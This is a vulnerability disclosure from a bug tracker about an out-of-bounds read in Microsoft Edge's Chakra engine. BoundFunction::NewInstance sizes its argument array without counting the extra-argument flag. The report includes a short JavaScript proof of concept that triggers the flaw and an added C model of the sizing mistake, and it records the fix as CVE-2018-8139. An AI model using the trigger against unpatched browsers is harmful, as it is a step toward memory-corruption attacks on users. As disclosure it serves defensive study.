
Issue metadata

Status: Fixed
Closed: Jul 2018


Issue 1569: Microsoft Edge: Chakra: A bug in BoundFunction::NewInstance

Reported by, May 4 2018 Project Member

Issue description

BoundFunction::NewInstance is used to handle calls to a bound function. The method first allocates a new argument array, copies the prepended arguments and the others into the new argument array, and calls the actual function. The problem is that it doesn't care about the CallFlags_ExtraArg flag, which indicates that there's an extra argument ( in the PoC) at the end of the argument array. So the size of the new argument array created with the CallFlags_ExtraArg flag will always be 1 less than required, which leads to an OOB read.
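The sizing mistake described above, as an added stand-alone model written for this page (it is not ChakraCore code, and the flag value, the ArgArray type and every function name are assumptions made for illustration). The buggy sizer counts only prepended plus provided arguments; the fixed one reserves the trailing slot whenever the extra-arg flag is set. A bounds-checked read stands in for the unchecked access in the engine, so a false return is the model's equivalent of the OOB read.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Simplified model of the report's sizing bug, not ChakraCore code: the flag
 * value, the ArgArray type and the function names are illustrative assumptions. */
#define CALLFLAGS_EXTRAARG 0x1u

typedef struct {
    size_t count;   /* number of slots actually allocated */
    int   *slots;
} ArgArray;

typedef size_t (*arg_sizer)(size_t prepended, size_t provided, unsigned flags);

/* Buggy sizing: counts prepended and provided arguments only and ignores the
 * extra-arg flag, so the array is one slot short whenever the flag is set. */
size_t buggy_arg_count(size_t prepended, size_t provided, unsigned flags)
{
    (void)flags;
    return prepended + provided;
}

/* Fixed sizing: reserves the trailing slot the flag asks for. */
size_t fixed_arg_count(size_t prepended, size_t provided, unsigned flags)
{
    return prepended + provided + ((flags & CALLFLAGS_EXTRAARG) ? 1 : 0);
}

/* Bounds-checked read. The real copy and read are unchecked, so a false
 * return here corresponds to the out-of-bounds read the report describes. */
static bool read_slot(const ArgArray *a, size_t i, int *out)
{
    if (i >= a->count)
        return false;
    *out = a->slots[i];
    return true;
}

/* Build the argument array the way NewInstance is described (prepended
 * arguments first, then the call's own), then fetch the trailing extra
 * argument that the flag promises. Returns true only if that fetch is in bounds. */
bool bound_call_in_bounds(arg_sizer sizer,
                          const int *pre, size_t npre,
                          const int *call, size_t ncall,
                          unsigned flags)
{
    ArgArray a;
    a.count = sizer(npre, ncall, flags);
    a.slots = calloc(a.count ? a.count : 1, sizeof(int));
    if (!a.slots)
        return false;

    /* Copy what NewInstance copies: prepended arguments, then the call's own. */
    if (npre)
        memcpy(a.slots, pre, npre * sizeof(int));
    if (ncall)
        memcpy(a.slots + npre, call, ncall * sizeof(int));

    bool ok = true;
    if (flags & CALLFLAGS_EXTRAARG) {
        int extra;
        /* The extra argument sits after all regular arguments. */
        ok = read_slot(&a, npre + ncall, &extra);
    }
    free(a.slots);
    return ok;
}

int main(void)
{
    /* Mirrors the PoC shape: bind prepends one argument, the construct call
     * passes none, and the call carries the extra trailing argument. */
    const int pre[] = { 1 };
    printf("buggy sizing stays in bounds: %s\n",
           bound_call_in_bounds(buggy_arg_count, pre, 1, NULL, 0,
                                CALLFLAGS_EXTRAARG) ? "yes" : "no");
    printf("fixed sizing stays in bounds: %s\n",
           bound_call_in_bounds(fixed_arg_count, pre, 1, NULL, 0,
                                CALLFLAGS_EXTRAARG) ? "yes" : "no");
    return 0;
}
```

The point of the model is that the defect is purely in the size computation: the copy loop itself is fine, but because the allocation ignores the flag, the first access to the slot after the regular arguments lands one element past the end of the buffer, which is why the report describes the array as always being exactly one slot short.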

// Target function; its body is irrelevant, only the bound call path matters.
function func() {}

// Bound function with one prepended argument (1).
let bound = func.bind({}, 1);

// Calling the bound function as a constructor takes the path through
// BoundFunction::NewInstance with the extra trailing argument present.
Reflect.construct(bound, []);

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Comment 1 by, May 17 2018

Project Member

Comment 2 by, Jul 11 2018

Project Member
Labels: CVE-2018-8139
Status: Fixed (was: New)

Comment 3 Deleted

Comment 4 by, Jul 11 2018

Project Member
Labels: -Restrict-View-Commit
